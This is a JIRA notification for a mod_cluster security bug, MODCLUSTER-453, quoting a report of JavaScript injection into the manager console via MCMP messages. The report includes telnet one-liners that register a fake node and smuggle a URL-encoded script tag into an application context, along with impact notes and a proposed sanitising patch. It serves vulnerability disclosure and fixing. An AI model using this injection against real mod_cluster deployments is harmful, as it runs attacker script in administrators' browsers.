[JBoss JIRA] (MODCLUSTER-453) It is possible to inject JavaScript into mod_cluster manager console via MCMP messages
by RH Bugzilla Integration (JIRA)
[ https://issues.jboss.org/browse/MODCLUSTER-453?page=com.atlassian.jira.pl... ]
RH Bugzilla Integration commented on MODCLUSTER-453:
----------------------------------------------------
baranowb <bbaranow(a)redhat.com> changed the Status of [bug 1326179|https://bugzilla.redhat.com/show_bug.cgi?id=1326179] from NEW to MODIFIED
> It is possible to inject JavaScript into mod_cluster manager console via MCMP messages
> --------------------------------------------------------------------------------------
>
> Key: MODCLUSTER-453
> URL: https://issues.jboss.org/browse/MODCLUSTER-453
> Project: mod_cluster
> Issue Type: Bug
> Components: Native (httpd modules)
> Affects Versions: 1.2.6.Final, 1.2.9.Final, 1.2.11.Final, 1.3.1.Beta2
> Reporter: Michal Karm Babacek
> Assignee: Jean-Frederic Clere
> Priority: Critical
> Fix For: 1.3.2.Final, 1.2.12.Final
>
> Attachments: MODCLUSTER-453_master-better_one.patch, MODCLUSTER-453_master-mbabacek.patch, MODCLUSTER-453_master-offensive_approach.patch, patch.new.best.patch, patch.new.txt, patch.txt
>
>
> This is a nasty one indeed :-)
> h3. Steps to reproduce
> * start Apache HTTP Server with mod_cluster
> * send these messages (provided you test instance listens on 127.0.0.1)
> {code}
> { echo "CONFIG / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 95"; echo "User-Agent: Prdel"; echo ""; echo "JVMRoute=fake-1&Ho5t=127.0.0.1&Maxattempts=1&Port=8009&StickySessionForce=No&Type=ajp&ping=10"; sleep 1;} | telnet 127.0.0.1 6666
> { echo "ENABLE-APP / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 102"; echo "User-Agent: ClusterListener%2F1.0"; echo ""; echo 'JVMRoute%3Dfake-1%26Alias%3Ddefault-host%26Context%3D%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E'; sleep 1;} | telnet 127.0.0.1 6666
> {code}
> * Open http://localhost:6666/mod_cluster_manager and enjoy JavaScript pop-up Alert being executed.
> h3. Impact
> * Anyone with access to the (hopefully only internal) network from which MCMP messages are allowed to come from could send these messages and execute arbitrary JavaScript code.
> h3. Suggestion
> * Leverage {{apr_escape*}} to sanitize MCMP messages.
> h3. Proposed patch
> * [^patch.new.best.patch]: MCMP messages containing suspicious characters are discarded.
--
This message was sent by Atlassian JIRA
(v6.4.11#64026)